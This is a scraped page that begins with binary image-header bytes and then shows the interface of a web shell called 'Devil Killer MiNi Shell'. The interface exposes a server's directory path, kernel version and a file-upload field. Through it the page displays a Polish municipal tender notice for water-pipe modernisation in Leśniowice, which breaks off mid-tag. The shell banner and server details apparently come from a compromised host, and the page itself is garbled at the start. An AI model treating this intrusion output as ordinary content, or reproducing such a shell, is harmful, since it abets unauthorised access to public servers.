JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251021/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251021/0048666001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja sieci wodociągowej na terenie gminy Leśniowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LEŚNIOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110198050</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">21A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leśniowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@uglesniowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uglesniowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja sieci wodociągowej na terenie gminy Leśniowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bbb2097-338c-454b-89ba-93ec087b5c89</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00486660</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020112/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Modernizacja sieci wodociągowej na terenie gminy Leśniowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Działanie 3.4 Zrównoważona gospodarka wodno - ściekowa (typ projektu 1-3), Priorytet III Ochrona zasobów środowiska i klimatu programu Fundusze Europejskie dla Lubelskiego 2021-2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-lesniowice.lubelskie.pl/#/offer/abae5cc2-beaf-4407-8822-688fdc1562e9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-lesniowice.lubelskie.pl/#/offer/abae5cc2-beaf-4407-8822-688fdc1562e9</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem bezpłatnej Platformy Zamówień Publicznych ZETOPZP dostępnej pod adresem https://zamowienia-lesniowice.lubelskie.pl/#/offer/abae5cc2-beaf-4407-8822-688fdc1562e9. 2. Wnioski ,zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pośrednictwem Platformy Zamówień Publicznych ZETOPZP: https://zamowienia lesniowice.lubelskie.pl/ Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi założyć konto na Platformie Zamówień publicznych ZETOPZP: https://zamowienialesniowice.lubelskie.pl/#/authentication/register gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. 3. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej https: https://zamowienia-lesniowice.lubelskie.pl/#/help oraz uznaje go za wiążący. 4. Zamawiający, zgodnie z art. 67 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320) określa następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej przy wykorzystaniu Platformy Zakupowej, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje; c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer; d) włączona obsługa JavaScript; e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.; f) podłączony lub wbudowany do komputera czytnik kartykryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę. 5. Informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff,.xades,.sig,b) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; 6. Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z platformy wskazane w Instrukcji użytkownika i SWZ. 7. Sporządzanie i przekazywanie informacji w tym dokumentów elektronicznych musi być zgodne z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. 8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze znacznikiem czasu UTC. Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z jej wymaganiami.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający <br/>informuje, że: <br/>1)	Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2)	dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>na zadanie pn.: „Modernizacja sieci wodociągowej na terenie gminy Leśniowice” prowadzonym w trybie w trybie podstawowym a odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2024 r. poz. 1320 z późn. zm.) dalej „ustawa Pzp”; <br/>3)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>4)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>5)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>6)	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>7)	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.8.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3408782,67 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja inwestycji pod nazwą: „Modernizacja sieci wodociągowej na terenie gminy Leśniowice”. Długość modernizowanej sieci wodociągowej – 2964 m.<br/>2.	Na przedmiot zamówienia składają się:<br/>2.1. Przebudowa i rozbudowa sieci wodociągowej w m. Leśniowice, obejmująca:<br/>2.1.1.	budowę nowych rurociągów sieci wodociągowej obok istniejącego rozdzielczego układu wodociągowego w m. Leśniowice,<br/>2.1.2.	przepięcie istniejących przyłączy wodociągowych do nowej sieci wodociągowej, <br/>2.1.3.	zakorkowanie i zamulenie pozostawionych wyłączonych z eksploatacji odcinków wodociągu.<br/>Charakterystyka inwestycji: Sieć wodociągowa z rur PE: PE90 - L= 244,0 m Hydranty p.poż. nadziemne DN80 - 2 szt. Przewody wodociągowe zaprojektowano z rur PE100 RC SDR11 PN16 łączonych na zgrzew doczołowy lub mufy elektrooporowe. W węzłach zaprojektowano armaturę kołnierzową z żeliwa sferoidalnego. <br/>2.2.	Przebudowa i rozbudowa sieci wodociągowej w m. Majdan Leśniowski, obejmująca:<br/>2.2.1.	budowę nowych rurociągów sieci wodociągowej obok istniejącego rozdzielczego układu wodociągowego w m. Leśniowice,<br/>2.2.2.	przepięcie istniejących przyłączy wodociągowych do nowej sieci wodociągowej, <br/>2.2.3.	zakorkowanie i zamulenie pozostawionych wyłączonych z eksploatacji odcinków wodociągu.<br/>Charakterystyka inwestycji: Sieć wodociągowa z rur PE: PE160 - L= 1170,0 m PE110 - L= 1400,0 m PE40 - L= 150,0 m Hydranty p.poż. nadziemne DN80 - 22 szt. Przewody wodociągowe zaprojektowano z rur PE100 RC SDR11 PN16 łączonych na zgrzew doczołowy lub mufy elektrooporowe. W węzłach zaprojektowano armaturę kołnierzową z żeliwa sferoidalnego. <br/><br/>2.3.	Wymiana zasuw i hydrantów w 65 lokalizacjach wskazanych przez eksploatatora sieci wodociągowej w obrębie wsi: Teresin, Alojzów, Majdan Leśniowski, Leśniowice, Politówka, Janówka, Kol. Leśniowice, Sielec, Kumów Majoracki, Kumów Plebański, Kasiłan, Nowy Folwark, Rakołupy, Plisków, Rakołupy Małe, Horodysko, Rakołupy Duże. Zasuwy wodociągowe podlegające wymianie: DN150 - 10 szt. DN100 - 8 szt. DN80 - 53 szt. Hydranty p.poż. nadziemne podlegające wymianie: DN80 - 52 szt. DN100 - 1 szt. <br/>2.4.	Wykonanie robót budowlanych zgodnie z zasadami wiedzy technicznej przy zastosowaniu obowiązujących przepisów i warunków technicznych wg dokumentacji projektowej w tym: <br/>2.4.1.	obsługa geodezyjna prowadzonych robót, <br/>2.4.2.	opracowanie harmonogramu rzeczowo – finansowego robót budowlanych, <br/>2.4.3.	przeprowadzanie pomiarów kontrolnych w trakcie realizacji robót w tym robót zanikających oraz po zakończeniu robót i przedstawianie wyników badań do akceptacji przez Zamawiającego lub ustanowionego Inspektora nadzoru,<br/>2.4.4.	opracowanie oraz dostarczenie Zamawiającemu kompletnej dokumentacji powykonawczej, <br/>2.4.5.	sporządzenie geodezyjnej inwentaryzacji powykonawczej, <br/>2.4.6.	dokonanie przez Wykonawcę w imieniu Zamawiającego wszelkich zgłoszeń i uzgodnień i zezwoleń,<br/>2.4.7.	przekazanie Zamawiającemu Inwestycji do użytkowania.<br/>3.	Wykonawca powinien zrealizować całość inwestycji uwzględniając aspekty ekonomiczne, środowiskowe i społeczne.<br/>4.	Szczegółowy zakres zamówienia, warunki oraz sposób ich wykonania został opisany w Dokumentacji technicznej w skład której wchodzą: Projekt zagospodarowania terenu, Projekt architektoniczno – budowlany, Projekt techniczny, Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, Załączniki do projektu, przedmiary robót. Dokumentacja techniczna stanowi załącznik nr 1 do SWZ. <br/>Z uwagi na to, że wynagrodzenie wykonawcy wskazane w ofercie będzie miało charakter ryczałtowy, wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w dokumentacji technicznej, o której mowa w pkt 4.4. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarach lub robót w większej ilości w stosunku do przyjętej w przedmiarach, nie będzie uprawniało wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji technicznej.<br/>5.	Szczegółowe wymagania oraz obowiązki Wykonawcy zawarte są we wzorze umowy stanowiącym załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">42131160-5 - Hydranty</p> <p class="mb-0">42131150-2 - Zawory hydrantowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie nw. kryteriów oceny ofert.<br/>Cena (C) 60 %<br/>Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia (G) 40 %<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>punkt.<br/>1. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>C =Cn/ Cb x 60 pkt<br/>gdzie,<br/>C- ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>do oferty z najniższą ceną odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po<br/>przecinku.<br/>2. Kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia”<br/>będzie liczone w miesiącach.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 36 miesięcy licząc od daty odbioru końcowego. w przypadku<br/>zaoferowania przez Wykonawcę długości okresu gwarancji krótszego niż 60 miesięcy, Zamawiający odrzuci ofertę.<br/>Maksymalny okres gwarancji - 84 miesięcy licząc od daty odbioru końcowego. Jeżeli w danej ofercie wystąpi okres gwarancji dłuższy<br/>niż 84 miesięcy, to do obliczenia liczby punktów dla tej oferty za kryterium zostanie przyjęte 84 miesięcy. Wykonawcy oferują długość<br/>okresu gwarancji w pełnych miesiącach (w przedziale od 60 do 84miesięcy). W przypadku gdy Wykonawca nie wskaże w ofercie<br/>oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca nie oferuje gwarancji i ofertę odrzuci.<br/>Liczba punktów przyznana danej ofercie za kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane<br/>materiały i zamontowane urządzenia” zostanie obliczona wg wzoru:<br/>G =Go/ Gmax x 40 pkt<br/>gdzie:<br/>G – Liczba punktów za kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i<br/>zamontowane urządzenia”,<br/>Go – okres gwarancji podany w badanej ofercie<br/>Gmax – maksymalny okres gwarancji (84 miesięcy)<br/>3. Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P) stanowiących sumę przyznanych w ramach każdego z<br/>podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + G<br/>gdzie: P – łączna ilość punktów oferty ocenianej,<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>G – liczba punktów uzyskanych w kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i<br/>zamontowane urządzenia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 